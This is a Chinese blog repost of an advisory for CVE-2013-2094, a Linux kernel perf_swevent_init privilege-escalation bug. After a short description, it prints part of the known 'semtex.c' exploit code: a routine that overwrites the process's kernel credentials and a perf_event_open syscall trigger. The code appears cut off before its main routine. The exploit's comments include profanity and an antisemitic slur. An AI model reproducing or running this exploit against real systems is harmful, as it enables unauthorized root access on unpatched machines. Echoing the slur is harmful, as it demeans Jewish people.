Linux kernel kernel/events/core.c perf_swevent_ini函数权限提升漏洞

企鹅博客
企鹅博客
企鹅博客
25193
文章
0
评论
2019年9月30日11:37:32 评论 129 views
广告也精彩

发布日期:2013-05-14
更新日期:2013-06-04

受影响系统:
Linux kernel < 3.8.9
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-2094
 
Linux Kernel是Linux操作系统的内核。
 
Linux kernel 3.8.9之前版本在kernel/events/core.c的函数perf_swevent_init中使用了错误的整数数据类型,本地用户通过特制的perf_event_open系统调用,利用此漏洞可提升自己的权限。
 
<*来源:vendor
 
  链接:https://bugzilla.RedHat.com/show_bug.cgi?id=962792
        http://zone.wooyun.org/content/3733
        http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* linux 2.6.37-3.x.x x86_64, ~100 LOC
* gcc-4.6 -O2 semtex.c && ./a.out
* 2010 [email protected], salut!
*
* update may 2013:
* seems like CentOS 2.6.32 backported the perf bug, lol.
* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
*/

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}

企鹅博客
  • 本文由 发表于 2019年9月30日11:37:32
  • 转载请务必保留本文链接:https://www.qieseo.com/151875.html

发表评论